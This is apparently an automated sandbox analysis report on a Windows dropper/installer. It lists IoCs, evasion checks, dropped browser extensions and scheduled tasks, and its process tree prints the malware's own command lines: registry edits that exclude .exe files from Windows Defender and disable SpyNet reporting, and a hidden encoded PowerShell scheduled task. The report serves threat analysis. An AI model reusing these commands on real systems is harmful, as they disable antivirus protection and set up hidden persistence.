Analysis
-
max time kernel
131s -
max time network
135s -
platform
windows10-1703_x64 -
resource
win10-20231020-en -
resource tags
arch:x64arch:x86image:win10-20231020-enlocale:en-usos:windows10-1703-x64system -
submitted
23-11-2023 15:37
Static task
static1
General
-
Target
a85de712be24eefa27cd0bd7d02c794ee1ebed4fa8326c9a044913f29657f91a.exe
-
Size
7.2MB
-
MD5
091ecfa1ddd5fe08699d5c8e9a9cd68f
-
SHA1
5c27332e383b494db2953b301da59a5676e8d27c
-
SHA256
a85de712be24eefa27cd0bd7d02c794ee1ebed4fa8326c9a044913f29657f91a
-
SHA512
b9893954c1ecc73a68d6bace879894646e510c228e7b15923aad308090105030b8757bb4a850e1456cc4aec04f2db6f9efff47e2d952a2856d2ffb545d1b6e07
-
SSDEEP
196608:91OxbCW9yVOMRyvsrmXlCwSHP/7/4S/F28WSGA:3Ox+hOM+srec5/7/5/FHWSl
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 36 4628 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2640874492-649017405-3475600720-1000\Control Panel\International\Geo\Nation WUmcOyK.exe -
Executes dropped EXE 4 IoCs
pid Process 3040 Install.exe 3488 Install.exe 192 vZcNxOl.exe 780 WUmcOyK.exe -
Loads dropped DLL 1 IoCs
pid Process 4628 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json WUmcOyK.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json WUmcOyK.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini WUmcOyK.exe -
Drops file in System32 directory 33 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol vZcNxOl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B WUmcOyK.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE WUmcOyK.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F WUmcOyK.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini vZcNxOl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content WUmcOyK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 WUmcOyK.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\sIeOoMJfZQUn\StRPJzi.dll WUmcOyK.exe File created C:\Program Files (x86)\ugoHhkvuU\oqMMND.dll WUmcOyK.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi WUmcOyK.exe File created C:\Program Files (x86)\ClDztWYwqujU2\gogqxMrMUNZDU.dll WUmcOyK.exe File created C:\Program Files (x86)\WncRsuDbmbPeC\eECJjby.dll WUmcOyK.exe File created C:\Program Files (x86)\WncRsuDbmbPeC\IBZKuhh.xml WUmcOyK.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi WUmcOyK.exe File created C:\Program Files (x86)\ugoHhkvuU\LUqbSSd.xml WUmcOyK.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja WUmcOyK.exe File created C:\Program Files (x86)\ZIaJvzMHdMrGyfdlEQR\AkQJgbb.dll WUmcOyK.exe File created C:\Program Files (x86)\ClDztWYwqujU2\hAybsEN.xml WUmcOyK.exe File created C:\Program Files (x86)\ZIaJvzMHdMrGyfdlEQR\SLusLMk.xml WUmcOyK.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak WUmcOyK.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak WUmcOyK.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bcBhLullztQfmhiPXd.job schtasks.exe File created C:\Windows\Tasks\EpRCoSCBjpSgFDjnu.job schtasks.exe File created C:\Windows\Tasks\UNRLnkjTyboRSZM.job schtasks.exe File created C:\Windows\Tasks\JtsNICArfjZPvKOaU.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2456 schtasks.exe 4476 schtasks.exe 3936 schtasks.exe 3756 schtasks.exe 2764 schtasks.exe 4552 schtasks.exe 2076 schtasks.exe 4064 schtasks.exe 2156 schtasks.exe 2452 schtasks.exe 4664 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket WUmcOyK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{ba05db4e-0000-0000-0000-d01200000000} WUmcOyK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WUmcOyK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" WUmcOyK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix WUmcOyK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" WUmcOyK.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" WUmcOyK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2504 powershell.EXE 2504 powershell.EXE 2504 powershell.EXE 2136 powershell.exe 2136 powershell.exe 2136 powershell.exe 4648 powershell.exe 4648 powershell.exe 4648 powershell.exe 3752 powershell.EXE 3752 powershell.EXE 3752 powershell.EXE 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe 780 WUmcOyK.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2504 powershell.EXE Token: SeDebugPrivilege 2136 powershell.exe Token: SeDebugPrivilege 4648 powershell.exe Token: SeDebugPrivilege 3752 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5020 wrote to memory of 3040 5020 a85de712be24eefa27cd0bd7d02c794ee1ebed4fa8326c9a044913f29657f91a.exe 71 PID 5020 wrote to memory of 3040 5020 a85de712be24eefa27cd0bd7d02c794ee1ebed4fa8326c9a044913f29657f91a.exe 71 PID 5020 wrote to memory of 3040 5020 a85de712be24eefa27cd0bd7d02c794ee1ebed4fa8326c9a044913f29657f91a.exe 71 PID 3040 wrote to memory of 3488 3040 Install.exe 72 PID 3040 wrote to memory of 3488 3040 Install.exe 72 PID 3040 wrote to memory of 3488 3040 Install.exe 72 PID 3488 wrote to memory of 3436 3488 Install.exe 74 PID 3488 wrote to memory of 3436 3488 Install.exe 74 PID 3488 wrote to memory of 3436 3488 Install.exe 74 PID 3488 wrote to memory of 652 3488 Install.exe 76 PID 3488 wrote to memory of 652 3488 Install.exe 76 PID 3488 wrote to memory of 652 3488 Install.exe 76 PID 652 wrote to memory of 4512 652 forfiles.exe 78 PID 652 wrote to memory of 4512 652 forfiles.exe 78 PID 652 wrote to memory of 4512 652 forfiles.exe 78 PID 3436 wrote to memory of 3388 3436 forfiles.exe 79 PID 3436 wrote to memory of 3388 3436 forfiles.exe 79 PID 3436 wrote to memory of 3388 3436 forfiles.exe 79 PID 4512 wrote to memory of 1076 4512 cmd.exe 80 PID 4512 wrote to memory of 1076 4512 cmd.exe 80 PID 4512 wrote to memory of 1076 4512 cmd.exe 80 PID 3388 wrote to memory of 3688 3388 cmd.exe 81 PID 3388 wrote to memory of 3688 3388 cmd.exe 81 PID 3388 wrote to memory of 3688 3388 cmd.exe 81 PID 4512 wrote to memory of 4648 4512 cmd.exe 82 PID 4512 wrote to memory of 4648 4512 cmd.exe 82 PID 4512 wrote to memory of 4648 4512 cmd.exe 82 PID 3388 wrote to memory of 1548 3388 cmd.exe 83 PID 3388 wrote to memory of 1548 3388 cmd.exe 83 PID 3388 wrote to memory of 1548 3388 cmd.exe 83 PID 3488 wrote to memory of 4476 3488 Install.exe 84 PID 3488 wrote to memory of 4476 3488 Install.exe 84 PID 3488 wrote to memory of 4476 3488 Install.exe 84 PID 3488 wrote to memory of 2816 3488 Install.exe 86 PID 3488 wrote to memory of 2816 3488 Install.exe 86 PID 3488 wrote to memory of 2816 3488 Install.exe 86 PID 2504 wrote to memory of 4092 2504 powershell.EXE 90 PID 2504 wrote to memory of 4092 2504 powershell.EXE 90 PID 3488 wrote to memory of 2068 3488 Install.exe 95 PID 3488 wrote to memory of 2068 3488 Install.exe 95 PID 3488 wrote to memory of 2068 3488 Install.exe 95 PID 3488 wrote to memory of 3936 3488 Install.exe 97 PID 3488 wrote to memory of 3936 3488 Install.exe 97 PID 3488 wrote to memory of 3936 3488 Install.exe 97 PID 192 wrote to memory of 2136 192 vZcNxOl.exe 100 PID 192 wrote to memory of 2136 192 vZcNxOl.exe 100 PID 192 wrote to memory of 2136 192 vZcNxOl.exe 100 PID 2136 wrote to memory of 3580 2136 powershell.exe 102 PID 2136 wrote to memory of 3580 2136 powershell.exe 102 PID 2136 wrote to memory of 3580 2136 powershell.exe 102 PID 3580 wrote to memory of 1440 3580 cmd.exe 103 PID 3580 wrote to memory of 1440 3580 cmd.exe 103 PID 3580 wrote to memory of 1440 3580 cmd.exe 103 PID 2136 wrote to memory of 4924 2136 powershell.exe 104 PID 2136 wrote to memory of 4924 2136 powershell.exe 104 PID 2136 wrote to memory of 4924 2136 powershell.exe 104 PID 2136 wrote to memory of 3424 2136 powershell.exe 105 PID 2136 wrote to memory of 3424 2136 powershell.exe 105 PID 2136 wrote to memory of 3424 2136 powershell.exe 105 PID 2136 wrote to memory of 4524 2136 powershell.exe 106 PID 2136 wrote to memory of 4524 2136 powershell.exe 106 PID 2136 wrote to memory of 4524 2136 powershell.exe 106 PID 2136 wrote to memory of 1728 2136 powershell.exe 107 PID 2136 wrote to memory of 1728 2136 powershell.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\a85de712be24eefa27cd0bd7d02c794ee1ebed4fa8326c9a044913f29657f91a.exe"C:\Users\Admin\AppData\Local\Temp\a85de712be24eefa27cd0bd7d02c794ee1ebed4fa8326c9a044913f29657f91a.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Users\Admin\AppData\Local\Temp\7zSA911.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Users\Admin\AppData\Local\Temp\7zSAEAF.tmp\Install.exe.\Install.exe /IKSldidlCFe "385118" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3488 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3388 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:3688
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1548
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4512 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1076
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:4648
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gVOuAFVzf" /SC once /ST 01:39:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:4476
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gVOuAFVzf"4⤵PID:2816
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gVOuAFVzf"4⤵PID:2068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bcBhLullztQfmhiPXd" /SC once /ST 15:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HIMqRCFMvphntkoVF\laiBCMBTeUBwuMJ\vZcNxOl.exe\" np /oxsite_idkma 385118 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3936
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4092
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4080
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:4844
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3744
-
